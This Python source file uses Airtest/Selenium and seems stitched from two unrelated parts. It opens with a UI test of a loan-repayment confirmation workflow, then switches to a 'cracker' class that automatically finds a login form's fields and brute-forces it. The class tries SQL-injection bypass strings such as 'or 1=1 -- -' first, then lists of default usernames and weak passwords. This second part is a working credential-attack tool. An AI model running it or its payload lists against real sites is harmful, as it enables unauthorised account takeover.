resolution=(100, 100)), "保存")
driver.execute_script('window.scrollTo(0,document.body.scrollHeight)') #滑到底部
driver.airtest_touch(
Template(r"tpl1595490704194.png",
record_pos=(1.755, 9.28),
resolution=(100, 100)))
driver.assert_template(
Template(r"tpl1595319540507.png",
record_pos=(13.675, 2.655),
resolution=(100, 100)), "提交成功")
# 登录夏子霞确认还款
common.login(driver, "xiazixia")
common.confirm_repayment(driver) # 确认还款
common.quit(driver)
# 登录黄振旭查看是否已确认还款
common.login(driver, "huangzhenxu")
driver.find_element_by_xpath(
"//*[@id=\"app\"]/div/div/div[2]/div/div/ul/div[3]/li/ul/div[3]/a/li/span"
).click()
driver.assert_template(
Template(r"tpl1595316700201.png",
record_pos=(11.41, 1.0),
resolution=(100, 100)), "进入还款申请单")
driver.refresh() # 刷新方法 refresh
driver.assert_template(
Template(r"tpl1595320236760.png",
record_pos=(15.155, 4.69),
resolution=(100, 100)), "显示已收款")
auto_setup(__file__)
class cracker():
def __init__(self, target_url):
self.driver = WebChrome()
self.driver.get(target_url)
self.driver.implicitly_wait(20)
self.exp_user_dic = [
"admin' or 'a'='a", "'or'='or'", "admin' or '1'='1' or 1=1",
"')or('a'='a", "'or 1=1 -- -"
]
self.exp_pass_dic = self.exp_user_dic
self.static_user_dic = [
'admin', 'system', 'sa', 'test', 'manager', 'root', 'user', 'www',
'web', 'username', 'guest', 'name', 'zhanghao', 'yonghu', 'email',
'account'
]
self.suffix_dic = ['', '123', '888', '666', '123456']
self.static_pass_dic = [
'{user}', '123456', '{user}888', '12345678', '123123', '88888888',
'888888', 'password', '123456a', '{user}123', '{user}123456',
'{user}666', '{user}2018', '123456789', '654321', '666666',
'66666666', '1234567890', '8888888', '987654321', '0123456789',
'12345', '1234567', '000000', '111111', '5201314', '123123',
'pass', 'password', 'P@ssw0rd', 'P@ssw0rd2019', 'P@ssw0rd2020',
'P@ssw0rd2021'
]
self.password_inputbox_id = ''
self.username_inputbox_id = ''
def find_element_ids(self):
page_source = self.driver.page_source
username_flags = ["user", "account", "用户名", "邮箱", "手机", "证号"]
rex_ele_id = re.compile(r'id="(\S*?)"')
rex_username_ele = re.compile(r'(<input .*type="text".*?>)')
rex_password_ele = re.compile(r'(<input .*type="password".*?>)')
possible_username_eles = rex_username_ele.findall(page_source)
username_ele = ''
for possible_username_ele in possible_username_eles:
if username_ele:
break
for username_flag in username_flags:
if username_flag in possible_username_ele:
username_ele = possible_username_ele
break
if not username_ele:
self.username_inputbox_id = ''
else:
self.username_inputbox_id = rex_ele_id.findall(username_ele)[0]
print("Uername Input Box ID:\t{}".format(
self.username_inputbox_id))
password_eles = rex_password_ele.findall(page_source)
password_ele = password_eles[0] if password_eles else ''
if not password_ele:
self.password_input_id = ''
else:
self.password_inputbox_id = rex_ele_id.findall(password_ele)[0]
print("Password Input Box ID:\t{}".format(
self.password_inputbox_id))
return True
def brute_force(self, username, password):
password = password.replace(
'{user}', username) if '{user}' in password else password
print('Trying {0}:{1}'.format(username, password))
username_ele = self.driver.find_element_by_id(
self.username_inputbox_id
) if self.username_inputbox_id else self.driver.find_element_by_xpath(
"//input[@type='text']")
password_ele = self.driver.find_element_by_id(
self.password_inputbox_id
) if self.password_inputbox_id else self.driver.find_element_by_xpath(
"//input[@type='password']")
username_ele.clear()
username_ele.send_keys(username)
password_ele.send_keys(password)
password_ele.send_keys(Keys.RETURN)
sleep(2)
if self.password_inputbox_id in self.driver.page_source and self.username_inputbox_id in self.driver.page_source:
print('Login Failed')
return False
else:
print('Login Succeed')
return True
def loop(self, users, passwords):
for user in users:
for password in passwords:
try:
ret = self.brute_force(user, password)
if ret:
return True
except Exception as e:
print(e)
self.driver.refresh()
sleep(1)
return False
def run(self, userfile='', passfile=''):
self.find_element_ids()
if userfile and passfile:
users = open(userfile).read().strip('\n').split('\n')
passwords = open(passfile).read().strip('\n').split('\n')
if self.loop(users, passwords):
print("爆破成功")
input()
else:
print("Loading inject users/passwords")
users = self.exp_user_dic
passwords = self.exp_pass_dic
if self.loop(users, passwords):
print("爆破成功")
input()
print("Loding default account pairs")
users = []
for suffix in self.suffix_dic:
for user in self.static_user_dic:
users.append(user + suffix)
passwords = self.static_pass_dic
if self.loop(users, passwords):
print("爆破成功")
input()
